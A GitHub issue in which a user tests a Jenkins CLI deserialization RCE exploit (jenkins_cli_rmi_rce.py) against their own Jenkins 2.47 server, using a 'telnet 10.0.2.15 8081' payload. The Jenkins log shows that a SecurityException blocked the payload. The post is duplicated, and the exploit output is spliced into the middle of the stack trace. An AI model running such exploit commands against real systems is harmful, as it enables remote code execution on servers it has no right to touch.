You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I have Jenkins 2.47 with nginx. I'm trying to verify the exploit using the jenkins_cli_rmi_rce.
I'm expecting to see the tcpdump output below to show the telnet attempting to connect on port 8081 (verified this by running this telnet cmd directly on appserver).
Dont think the exploit is working on my setup but I may be missing something obvious.
[] Retrieving the Jenkins CLI port
[] Connecting to Jenkins CLI on localhost:38539
[] Sending headers
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
[] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
Nothing on tcpdump
root@appserver:~# tcpdump port 8081 -i any
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes
The jenkins log shows the following output -
Jan 26, 2017 6:47:48 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #15 with /127.0.0.1:41626/88) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code.
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1711)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1982)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1533)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:420)
at hudson.remoting.Capability.read(Capability.java:140)
at hudson.remoting.ChannelBuilder.negotiate(ChannelBuilder.java:391)
at hudson.remoting.ChannelBuilder.b[+] Sent payload
uild(ChannelBuilder.java:310)
at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95)
at hudson.cli.CliProtocol$Handler.run(CliProtocol.java:82)
at hudson.cli.CliProtocol.handle(CliProtocol.java:58)
at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:230)
The text was updated successfully, but these errors were encountered:
I have Jenkins 2.47 with nginx. I'm trying to verify the exploit using the jenkins_cli_rmi_rce.
I'm expecting to see the tcpdump output below to show the telnet attempting to connect on port 8081 (verified this by running this telnet cmd directly on appserver).
Dont think the exploit is working on my setup but I may be missing something obvious.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 'telnet 10.0.2.15 8081'
[] Target IP: localhost
[] Target PORT: 8080
[] Retrieving the Jenkins CLI port
[] Connecting to Jenkins CLI on localhost:38539
[] Sending headers
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
[] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
Nothing on tcpdump
root@appserver:~# tcpdump port 8081 -i any
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes
The jenkins log shows the following output -
Jan 26, 2017 6:47:48 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #15 with /127.0.0.1:41626/88) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code.
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1711)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1982)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1533)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:420)
at hudson.remoting.Capability.read(Capability.java:140)
at hudson.remoting.ChannelBuilder.negotiate(ChannelBuilder.java:391)
at hudson.remoting.ChannelBuilder.b[+] Sent payload
uild(ChannelBuilder.java:310)
at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95)
at hudson.cli.CliProtocol$Handler.run(CliProtocol.java:82)
at hudson.cli.CliProtocol.handle(CliProtocol.java:58)
at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:230)
The text was updated successfully, but these errors were encountered: